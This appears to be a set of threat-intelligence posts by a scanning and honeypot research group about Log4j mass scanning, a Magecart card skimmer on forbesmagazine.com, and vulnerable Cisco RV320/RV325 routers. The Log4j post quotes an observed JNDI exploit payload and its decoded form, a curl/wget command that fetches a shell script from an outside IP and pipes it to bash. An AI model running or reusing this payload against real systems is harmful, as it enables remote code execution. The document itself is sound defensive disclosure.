Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (github.com/advisories/GHS…).

Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel Example CVE-2021-44228 payload:
${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}

Decoded:
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash

Source IP:
62.76.41.46 (🇷🇺)

⚠️ WARNING ⚠️
@Forbes Magazine subscription website (forbesmagazine.com) is infected with #magecart malware.

Exfil domain: fontsawesome[.]gq (🇧🇬)
@urlscanio results: urlscan.io/result/8630561…
Deobfuscated code: pastebin.com/3AR7wQ70 @Forbes @urlscanio forbesmagazine.com is back online and we've confirmed the malware has been removed.

If you made a purchase on the site while it was compromised, your credit card information was likely stolen.

https://twitter.com/BleepinComputer/status/1128672525628661761

Our honeypots recently detected opportunistic scanning activity targeting Cisco RV320/RV325 routers. A vulnerability exists in these routers that allow remote unauthenticated users to obtain the device's admin credentials – leading to RCE.
badpackets.net/over-9000-cisc… Using data provided by @binaryedgeio, we've scanned 15,309 unique IPv4 hosts and determined a total of 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653.

This interactive map shows the total vulnerable hosts found per country:
docs.google.com/spreadsheets/d…